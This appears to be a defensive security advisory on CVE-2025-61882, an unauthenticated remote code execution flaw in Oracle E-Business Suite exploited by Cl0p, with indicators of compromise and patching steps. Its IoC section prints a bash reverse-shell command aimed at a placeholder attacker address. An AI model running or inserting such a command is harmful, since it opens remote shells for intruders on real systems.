CVE-2025-61882 Oracle E-Business Suite Zero-Day Under Active Exploitation
Oracle has issued an emergency security alert for CVE-2025-61882, a critical vulnerability in Oracle E-Business Suite (EBS) with active exploitation confirmed by the Cl0p ransomware group. This zero-day flaw enables unauthenticated remote code execution and has already been weaponized in mass data theft campaigns targeting healthcare institutions and enterprises globally.
Vulnerability Details
CVE ID: CVE-2025-61882
CVSS Score: 9.8 (Critical)
Attack Vector: Network (HTTP/HTTPS)
Authentication Required: None
User Interaction: None
Impact: Remote Code Execution (RCE)
Affected Component: Oracle Concurrent Processing – BI Publisher
Affected Product: Oracle E-Business Suite
Versions Impacted: Multiple versions (requires October 2023 CPU as prerequisite for patching)
Technical Analysis
The Cl0p ransomware group has actively exploited CVE-2025-61882 since August 2025, according to Mandiant’s investigation. Evidence suggests the Scattered LAPSUS$ Hunters group may also be involved. Mandiant CTO Charles Carmakal confirmed that Cl0p combined CVE-2025-61882 with additional vulnerabilities from Oracle’s July 2025 Critical Patch Update to execute high-volume data theft operations.
Proof-of-concept exploit code has surfaced publicly, dramatically lowering the barrier for additional threat actors to weaponize this vulnerability. Security authorities have issued urgent warnings describing this as a “stop-what-you’re-doing and patch immediately” situation, noting that exploitation is already widespread.
Indicators of Compromise
Malicious IP Addresses:
- 200.107.207[.]26 (GET/POST activity)
- 185.181.60[.]11 (GET/POST activity)
Observed Commands:
sh -c /bin/bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1
File Hashes (SHA-256):
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
- exp.py: aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
- server.py: 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b
Immediate Actions Required
- Apply Oracle’s emergency patch immediately – Available through Oracle’s Security Alert advisory. Note: October 2023 Critical Patch Update must be applied first as a prerequisite.
- Network segmentation – Isolate or firewall EBS servers to prevent external access to BI Publisher and Concurrent Processing components.
- Threat hunting – Search for IoCs listed above across network logs, endpoint detection systems, and SIEM platforms. Look for unusual outbound connections from EBS servers.
- Compromise assessment – Organizations should assume potential compromise if patches were not applied before October 4, 2025. Conduct forensic analysis even after patching.
- Monitor threat intelligence feeds – Exploit activity continues to escalate. Additional threat actors will likely adopt available PoC exploits.
Report incidents – Contact local FBI field offices if compromise is confirmed or suspected.
Healthcare Sector Impact
Healthcare regulators have issued specific advisories for healthcare organizations using Oracle EBS. Given the sensitivity of patient data and operational criticality of hospital systems, healthcare entities face elevated risk from this vulnerability. Organizations should prioritize patching and implement compensating controls immediately.
Conclusion
CVE-2025-61882 represents a critical security emergency requiring immediate action. The combination of confirmed exploitation, public PoC availability, and zero authentication requirements creates an acute risk for all Oracle EBS deployments. Organizations must treat this as a priority-one incident and implement all recommended mitigations without delay.
References
- Oracle Security Alert – CVE-2025-61882: https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
- National Vulnerability Database – CVE-2025-61882: https://nvd.nist.gov/vuln/detail/CVE-2025-61882